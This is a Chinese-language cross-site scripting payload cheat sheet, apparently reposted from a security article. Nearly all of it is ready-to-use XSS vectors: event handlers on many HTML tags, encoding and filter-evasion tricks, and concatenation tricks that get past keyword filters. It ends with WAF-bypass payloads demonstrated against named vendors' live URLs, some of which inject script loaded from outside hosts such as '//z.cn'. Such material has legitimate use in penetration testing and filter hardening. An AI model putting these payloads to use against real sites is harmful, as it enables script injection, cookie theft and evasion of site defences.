一、xss 常见标签语句
0x01. <a> 标签
<a href="javascript:alert(1)">test</a><a href="x" onfocus="alert('xss');" autofocus="">xss</a><a href="x" onclick=eval("alert('xss');")>xss</a><a href="x" onmouseover="alert('xss');">xss</a><a href="x" onmouseout="alert('xss');">xss</a>
0x02. <img>标签
<img src=x onerror="alert(1)"><img src=x onerror=eval("alert(1)")><img src=1 onmouseover="alert('xss');"><img src=1 onmouseout="alert('xss');"><img src=1 onclick="alert('xss');">
0x03. <iframe>标签
<iframe src="javascript:alert(1)">test</iframe><iframe onload="alert(document.cookie)"></iframe><iframe onload="alert('xss');"></iframe><iframe onload="base64,YWxlcnQoJ3hzcycpOw=="></iframe><iframe onmouseover="alert('xss');"></iframe><iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgneHNzJyk8L3NjcmlwdD4=">
0x04. <audio> 标签
<audio src=1 onerror=alert(1)><audio><source src="x" onerror="alert('xss');"></audio><audio controls onfocus=eval("alert('xss');") autofocus=""></audio><audio controls onmouseover="alert('xss');"><source src="x"></audio>
0x05. <video>标签
<video src=x onerror=alert(1)><video><source onerror="alert('xss');"></video><video controls onmouseover="alert('xss');"></video><video controls onfocus="alert('xss');" autofocus=""></video><video controls onclick="alert('xss');"></video>
0x06. <svg> 标签
<svg onload=javascript:alert(1)>
<svg onload="alert('xss');"></svg>
0x07. <button> 标签
<button onclick=alert(1)><button onfocus="alert('xss');" autofocus="">xss</button><button onclick="alert('xss');">xss</button><button onmouseover="alert('xss');">xss</button><button onmouseout="alert('xss');">xss</button><button onmouseup="alert('xss');">xss</button><button onmousedown="alert('xss');"></button>
0x08. <div>标签
原代码:<div onmouseover='alert(1)'>DIV</div>经过url编码:<div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv>
0x09. <object>标签
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></object>
0x10. <script> 标签
<script>alert('xss')</script>
<script>alert(/xss/)</script>
<script>alert(123)</script>
0x11. <p> 标签
<p onclick="alert('xss');">xss</p>
<p onmouseover="alert('xss');">xss</p>
<p onmouseout="alert('xss');">xss</p>
<p onmouseup="alert('xss');">xss</p>
0x12. <input> 标签
<input onclick="alert('xss');"><input onfocus="alert('xss');"><input onfocus="alert('xss');" autofocus=""><input onmouseover="alert('xss');"><input type="text" onkeydown="alert('xss');"></input><input type="text" onkeypress="alert('xss');"></input><input type="text" onkeydown="alert('xss');"></input>
0x13. <details>标签
<details ontoggle="alert('xss');"></details><details ontoggle="alert('xss');" open=""></details>
0x14. <select> 标签
<select onfocus="alert('xss');" autofocus></select><select onmouseover="alert('xss');"></select><select onclick=eval("alert('xss');")></select>
0x15. <form> 标签
<form method="x" action="x" onmouseover="alert('xss');"><input type=submit></form><form method="x" action="x" onmouseout="alert('xss');"><input type=submit></form><form method="x" action="x" onmouseup="alert('xss');"><input type=submit></form>
0x16. <body> 标签
<body onload="alert('xss');"></body>
二、xss 常见绕过
编码绕过
0x01. html 实体编码
<a href="可控点">test</a><iframe src="可控点">test<iframe><img src=x onerror="可控点">
<a href="javascript:alert(1)">test</a>
<a href="javascript:alert(1)">test</a>
<a href="javascript:alert(1)">test</a>
<a href="javascript:alert(1)">test</a>
<a href="javascript:alert(1)">test</a>
0x02. url 编码
<a href="可控点">test</a> <iframe src="可控点">test</iframe>
<a href="javascript:alert(1)">test</a>
<iframe src="javascript:alert(1)">test</iframe>
<a href="javascript:%61%6c%65%72%74%28%31%29">test</a><iframe src="javascript:%61%6c%65%72%74%28%31%29">test</iframe>
<a href="javascript:%2561%256c%2565%2572%2574%2528%2531%2529">test</a><iframe src="javascript:%2561%256c%2565%2572%2574%2528%2531%2529">test</iframe>
0x03. js 编码
"\" 加上三个八进制数字,如果个数不够,前面补0,例如 "<" 编码为 "\074" "\x" 加上两个十六进制数字,如果个数不够,前面补0,例如 "<" 编码为 "\x3c" "\u" 加上四个十六进制数字,如果个数不够,前面补0,例如 "<" 编码为 "\u003c" 对于一些控制字符,使用特殊的 C 类型的转义风格(例如 \n 和 \r)
<img src=x onerror="可控点"> <input onfocus=location="可控点" autofocus>
<img src=x onerror="alert(1)">
<input onfocus=location="alert(1)" autofocus>
<img src=x onerror="\u0061\u006c\u0065\u0072\u0074(1)"><input onfocus=location="javascript:\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029" autofocus>
setTimeout(要执行的代码, 等待的毫秒数)setTimeout(JavaScript 函数, 等待的毫秒数)1.<svg/onload=setTimeout('\x61\x6C\x65\x72\x74\x28\x31\x29')>2.<svg/onload=setTimeout('\141\154\145\162\164\050\061\051')>3.<svg/onload=setTimeout('\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029')>4.<script>eval("\x61\x6C\x65\x72\x74\x28\x31\x29")</script>5.<script>eval("\141\154\145\162\164\050\061\051")</script>6.<script>eval("\u0061\u006C\u0065\u0072\u0074\u0028\u0031\u0029")</script>
0x04. 混合编码
<a href="可控点">test</a>
<a href="javascript:alert(1)">test</a>
<a href="javascript:alert(1)">test</a>
<a href="javascript:\u0061\u006c\u0065\u0072\u0074(1)">test</a>
<a href="javascript:%61%6c%65%72%74%28%31%29">test</a>
1. 原代码<a href="javascript:alert(1)">test</a>2. 对alert进行JS编码(unicode编码)<a href="javascript:\u0061\u006c\u0065\u0072\u0074(1)">test</a>3. 对href标签中的\u0061\u006c\u0065\u0072\u0074进行URL编码<a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)">test</a>4. 对href标签中的javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)进行HTML编码:<a href="javascript:%5c%75%30%30%36%31%5c%75%30%30%36%63%5c%75%30%30%36%35%5c%75%30%30%37%32%5c%75%30%30%37%34(1)">test</a>
0x05. base64 编码
data:资源类型;编码,内容<script>alert(/xss/)</script>
PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=
1.<object> 标签<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></object>2.<a> 标签<a href="data:text/html;base64, PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=">test</a> (新版浏览器不支持)3.<iframe> 标签<iframe src="data:text/html;base64, PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></iframe>4.<embed> 标签<embed src="data:text/html;base64, PHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4="></embed>
1.<a href=javascript:eval(atob('YWxlcnQoMSk='))>test</a>2.<a href=javascript:eval(window.atob('YWxlcnQoMSk='))>test</a>3.<a href=javascript:eval(window['atob']('YWxlcnQoMSk='))>test</a>4.<img src=x onmouseover="eval(window.atob('YWxlcnQoMSk='))">5.<img src=x onerror="eval(atob('YWxlcnQoMSk='))">6.<iframe src="javascript:eval(window['atob']('YWxlcnQoMSk='))"></iframe>
0x06. ascii 编码
alert(1)
十进制:97, 108, 101, 114, 116, 40, 49, 41
十六进制:0x61, 0x6C, 0x65, 0x72, 0x74, 0x28, 0x31, 0x29
<a href='javascript:eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))'>test</a>
<a href='javascript:eval(String.fromCharCode(0x61, 0x6C, 0x65, 0x72, 0x74, 0x28, 0x31, 0x29))'>test</a>
空格过滤绕过
圆括号过滤绕过
0x01. 反引号替换
<script>alert`1`</script>
0x02. throw 绕过
<video src onerror="javascript:window.onerror=alert;throw 1"><svg/onload="window.onerror=eval;throw'=alert\x281\x29';">
单引号过滤绕过
0x01. 斜杠替换
<script>alert(/xss/)</script>
0x02. 反引号替换
<script>alert(`xss`)</script>
alert 过滤绕过
0x01. prompt 替换
<script>prompt(/xss/)</script>
0x02. confirm 替换
<script>confirm(/xss/)</script>
0x03. console.log 替换
<script>console.log(3)</script>
0x04. document.write 替换
<script>document.write(1)</script>
0x05. base64 绕过
<img src=x onerror="Function`a${atob`YWxlcnQoMSk=`}```"><img src=x onerror="``.constructor.constructor`a${atob`YWxlcnQoMSk=`}```">
关键词置空绕过
0x01. 大小写绕过
<script>alert(/xss/)</script>
<ScRiPt>AlErT(/xss/)</sCrIpT>
0x02. 嵌套绕过
<script>alert(/xss/)</script>
<sc<script>ript>alert(/xss/)</sc</script>ript>
函数拼接
0x01. eval
<img src="x"onerror="eval('al'+'ert(1)')">
0x02. top
<img src="x" onerror="top['al'+'ert'](1)">
0x03. window
<img src="x" onerror="window['al'+'ert'](1)">
0x04. self
<img src="x" onerror="self[`al`+`ert`](1)">
0x05. parent
<img src="x" onerror="parent[`al`+`ert`](1)">
0x06. frames
<img src="x" onerror="frames[`al`+`ert`](1)">
0x07. 常用函数
<img src="x" onerror="eval(alert(1))"><img src="x" onerror="open(alert(1))"><img src="x" onerror="document.write(alert(1))"><img src="x" onerror="setTimeout(alert(1))"><img src="x" onerror="setInterval(alert(1))"><img src="x" onerror="Set.constructor(alert(1))"><img src="x" onerror="Map.constructor(alert(1))"><img src="x" onerror="Array.constructor(alert(1))"><img src="x" onerror="WeakSet.constructor(alert(1))"><img src="x" onerror="constructor.constructor(alert(1))"><img src="x" onerror="[1].map(alert(1))"><img src="x" onerror="[1].find(alert(1))"><img src="x" onerror="[1].every(alert(1))"><img src="x" onerror="[1].filter(alert(1))"><img src="x" onerror="[1].forEach(alert(1))"><img src="x" onerror="[1].findIndex(alert(1))">
赋值拼接
<img src onerror=_=alert,_(1)><img src x=al y=ert onerror=top[x+y](1)><img src onerror=top[a='al',b='ev',b+a]('alert(1)')><img src onerror=['ale'+'rt'].map(top['ev'+'al'])[0]['valu'+'eOf']()(1)>
火狐IE专属
<marquee onstart=alert(1)>
拆分法
<script>a='document.write("'</script><script>a=a+'<script src=ht'</script><script>a=a+'tp://test.com/xs'</script><script>a=a+'s.js></script>")'</script><script>eval(a)</script>
document.write("<script src = http://test.com/xss.js></script>")
安全狗
http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=top[`al`%2B`ert`](1);>http://www.safedog.cn/index/privateSolutionIndex.html?tab=2<video/src/onerror=appendChild(createElement("script")).src="//z.cn">
D盾
http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[`al`%2B`ert`](1);>http://www.d99net.net/News.asp?id=126<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>
云锁+奇安信 waf
http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[`al`%2B`ert`](1);>http://www.yunsuo.com.cn/ht/dynamic/20190903/259.html?id=1<video/src/onloadstart=top[a='al',b='ev',b%2ba](appendChild(createElement(`script`)).src=`//z.cn`);>
作者:3heer原文地址;https://www.freebuf.com/articles/web/340080.html
热文推荐
文章来源: http://mp.weixin.qq.com/s?__biz=MzUyMTA0MjQ4NA==&mid=2247540471&idx=1&sn=4395cf16332af36f46ad9e91e6470ac9&chksm=f9e331acce94b8bab4f58957cd7aa6534e43209907a0721a0c4d0624049077d407eef5a05dc4#rd
如有侵权请联系:admin#unsafe.sh
如有侵权请联系:admin#unsafe.sh